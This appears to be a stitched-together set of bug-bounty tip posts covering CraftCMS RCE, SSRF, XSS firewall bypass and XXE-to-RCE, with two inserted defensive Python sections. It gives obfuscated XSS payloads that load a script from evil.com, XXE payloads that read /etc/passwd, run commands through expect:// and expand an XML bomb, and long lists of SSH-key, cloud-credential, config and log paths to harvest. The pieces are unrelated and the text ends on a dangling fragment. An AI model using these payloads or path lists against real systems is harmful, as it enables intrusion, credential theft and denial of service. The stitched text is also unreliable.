DarkShadow truly remembers all of you:
Guys, some very interesting topics are coming soon about Advanced XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more. Show your love, guys!
1. Learn less, practice more.
2. Tools are nothing without core knowledge.
3. Chasing basic bugs won't make you elite.
4. Pro hunters create new exploits, not copy old ones.
5. Think beyond checklists, think like an attacker.
CVE-2025-32432: RCE in CraftCMS, 10.0 rating
0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.
Search at Netlas.io:
Link: https://nt.ls/XVVPd
Dork: http.headers.x_powered_by:"Craft CMS"
Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
Hello Hunters,
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots: the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow me: DarkShadow
#bugbountytips@brutsecurity #ssrf
Hey Hunters,
DarkShadow here, dropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use import() to level up your payload game. Try these sneaky XSS payloads:
import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')
// Base64 of alert('XSS!')
import('data:text/javascript,%61lert(document.cookie)')
// %61 = 'a'
Blind Payloads:
<script type="module">import('https://evil.com/payload.js');</script>
<img src=x onerror="import('https://evil.com/payload.js')">
<svg/onload="import('https://evil.com/payload.js')">
(()=>{import('https://evil.com/payload.js')})()
import(/*trick*/'https://evil.com/payload.js')
Encoded Variants:
\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')
// import as Unicode encoding
<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,105,108,46,99,111,109,47,112,97,121,46,106,115));</script>
// https://evil.com/pay.js ASCII decimal encoding
Evil Payload.js Example:
export function pwn() {
alert('DarkShadow is here!');
}
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the comments, I'll cook one up!
Follow me: DarkShadow
#bugbountytips #xss #wafbypass
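The post's point is that a WAF rule matching only alert(, prompt( or confirm( never sees the call once it is hidden behind import(), base64, percent-encoding or \u escapes. As an added example (not code from the post, and written in Python rather than the JavaScript of the payloads), the detector below decodes those layers first and then reports indicators; the names normalise, inspect, INDICATORS and SAMPLES are my own, SAMPLES holds the post's payloads, and "hello world" is a constructed benign input.

```python
# Added example (defender side); not code from the post. It shows why a WAF
# rule that only matches alert(/prompt(/confirm( misses the import() payloads
# above, and what a detector sees once it decodes the layers first.
import base64
import re
from urllib.parse import unquote

# The kind of rule the post describes as being bypassed: raw input, one regex.
NAIVE_WAF = re.compile(r"\b(alert|prompt|confirm)\s*\(", re.I)

# Indicators evaluated on the decoded, lower-cased form.
INDICATORS = [
    ("dynamic-import", re.compile(r"import\(")),
    ("from-char-code", re.compile(r"string\.fromcharcode\(")),
    ("data-url-script", re.compile(r"data:text/javascript")),
    ("remote-script-url", re.compile(r"https?://[^'\")]+\.js")),
    ("classic-sink", re.compile(r"\b(alert|prompt|confirm)\(")),
]


def normalise(payload: str) -> str:
    """Undo the encodings the payloads rely on, then canonicalise."""
    s = payload
    # 1. Percent-decoding, repeated (bounded) to undo double encoding: %61 -> a
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    # 2. JavaScript \uXXXX and \xXX escapes: \u0069 -> i
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

    # 3. base64 bodies of data: URLs, decoded in place so the real code is visible
    def _b64(m):
        try:
            body = base64.b64decode(m.group(1), validate=True)
            return "base64," + body.decode("utf-8", "replace")
        except ValueError:
            return m.group(0)

    s = re.sub(r"base64,([A-Za-z0-9+/=]+)", _b64, s)
    # 4. Comment tricks such as import(/*trick*/'...'), whitespace, case
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)
    return re.sub(r"\s+", "", s).lower()


def inspect(payload: str) -> dict:
    """Naive rule on the raw input versus indicators on the decoded form."""
    canon = normalise(payload)
    return {
        "naive_waf_hit": bool(NAIVE_WAF.search(payload)),
        "indicators": [name for name, rx in INDICATORS if rx.search(canon)],
    }


# The payloads from the post, in the order they appear there.
SAMPLES = [
    "import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')",
    "import('data:text/javascript,%61lert(document.cookie)')",
    """<svg/onload="import('https://evil.com/payload.js')">""",
    "import(/*trick*/'https://evil.com/payload.js')",
    r"\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')",
    "<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,"
    "105,108,46,99,111,109,47,112,97,121,46,106,115));</script>",
]

if __name__ == "__main__":
    for sample in SAMPLES + ["hello world"]:  # constructed benign input
        print(inspect(sample), "<-", sample)
```

None of the six payloads trips the naive rule, while every one of them carries at least one indicator after decoding; the first two even expose the literal alert( once the base64 and percent layers are removed. The practical lesson for a WAF or detection rule is to canonicalise before matching and to treat import( and data:text/javascript as sinks in their own right.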
Certified Red Team Professional (CRTP) - Notes
https://dev-angelist.gitbook.io/crtp-notes
javascript:(function(){
  /* Bookmarklet: collect quoted relative paths (e.g. "/api/v1/users") from the page's markup and from every external script, then print the unique set. */
  var scripts = document.getElementsByTagName("script"),
      regex = /(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;
  const results = new Set;
  for (var i = 0; i < scripts.length; i++) {
    var t = scripts[i].src;
    /* external scripts: fetch the source text and scan it; inline scripts have an empty src and are covered by the outerHTML scan below */
    "" != t && fetch(t).then(function(t){ return t.text() })
      .then(function(t){ var e = t.matchAll(regex); for (let r of e) results.add(r[0]) })
      .catch(function(t){ console.log("An error occurred: ", t) });
  }
  /* inline scripts and markup: scan the serialised document */
  var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex);
  for (const match of matches) results.add(match[0]);
  /* give the fetches three seconds, then replace the page with the list */
  function writeResults(){ results.forEach(function(t){ document.write(t + "<br>") }) }
  setTimeout(writeResults, 3e3);
})();
Hey everyone!
Sorry for not being active lately, been dealing with some health stuff. I'll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
- Saumadip | Brut Security
XXE to Remote Code Execution (RCE): Real-World Attack Chain
Hey Hunters,
DarkShadow here, dropping a quick tip for your next XXE hunt!
Escalating an XXE vulnerability:
1. Basic XXE Payload (Test Injection)
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
If the response contains /etc/passwd, the app is vulnerable to XXE.
2. RCE via expect:// PHP Wrapper (if enabled)
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective for bypassing WAF filters and getting any output in the correct format.)
4. XML Bomb (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Effect: Crashes or DoSes the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)
Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
Also check:
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
2. Dump Configs for DB Creds or Secrets
Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)
3. Bash History Abuse
Also check:
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
4. Read Logs for Token Harvesting
Web Server Logs:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
PHP / App-Specific Logs:
/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log
Laravel / Symfony / Framework Logs:
storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
System Logs (May Contain Leaks or Stack Traces):
/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log
Database Logs (If Exposed):
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log
5. Custom Internal Recon via /proc Files
Also check:
/proc/self/cmdline
/proc/self/fd/
Sometimes exposes secrets in memory or open database connections.
So guys, what about this methodology? If you really enjoyed it, don't forget to show your love!
Don't forget to follow me: DarkShadow
#bugbountytips #xxe
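Every step in the chain above (the file:// read, the expect:// wrapper, the php://filter trick and the entity bomb) depends on the parser honouring entity declarations in a DOCTYPE. As an added example from the defender's side (not code from the post), the parser below is built on Python's stdlib expat bindings and refuses those declarations before any entity is expanded; parse_hardened, check and UnsafeXML are names I chose, the hostile documents are the post's payloads 1, 2 and 4, and BENIGN is a constructed input.

```python
# Added example (defender side); not code from the post. Uses only Python's
# stdlib expat bindings. Hostile documents are the payloads from the post;
# the benign document is constructed for comparison.
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised when a document uses a DTD feature the policy forbids."""


def parse_hardened(xml_bytes: bytes, reject_doctype: bool = True) -> str:
    """Return the text content of a document, or raise UnsafeXML.

    reject_doctype=True  : any <!DOCTYPE> is refused outright (the usual advice
                           when the application never needs a DTD).
    reject_doctype=False : DTDs are tolerated, but every <!ENTITY> declaration
                           (internal or external) and every external entity
                           reference is refused, so file:// / expect:// / php://
                           lookups and entity-expansion bombs cannot happen.
    The handlers raise; pyexpat propagates the exception out of Parse(), and
    parsing stops at the first offending declaration, before any expansion.
    """
    parser = expat.ParserCreate()
    # Never fetch external parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    chunks = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if reject_doctype:
            raise UnsafeXML(f"DOCTYPE {name!r} refused by policy")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if sysid is not None else "internal"
        raise UnsafeXML(f"{kind} entity declaration {name!r} refused")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference to {sysid!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def check(xml_bytes: bytes, reject_doctype: bool = True) -> tuple:
    """('ok', text) | ('rejected', reason) | ('malformed', reason)."""
    try:
        return ("ok", parse_hardened(xml_bytes, reject_doctype))
    except UnsafeXML as exc:
        return ("rejected", str(exc))
    except expat.ExpatError as exc:
        return ("malformed", str(exc))


# Payloads from the post (steps 1, 2 and 4).
XXE_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>"""

XXE_EXPECT = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>"""

XML_BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

# Constructed benign input.
BENIGN = b'<?xml version="1.0"?><root>hello</root>'

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", XXE_FILE),
                       ("expect", XXE_EXPECT), ("bomb", XML_BOMB)]:
        print(label, "strict:", check(doc), "| dtd-tolerant:", check(doc, False))
```

With the default policy all three hostile documents are rejected at the DOCTYPE line; with reject_doctype=False they are still rejected at the first <!ENTITY> declaration, so the bomb never expands and no SYSTEM identifier is ever dereferenced. The same two controls (no DTD, or no entity declarations plus no external entity resolution) are what the equivalent settings in libxml2-based parsers such as PHP's are meant to enforce.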
It's lightweight, fast, and helps turn raw recon into insights.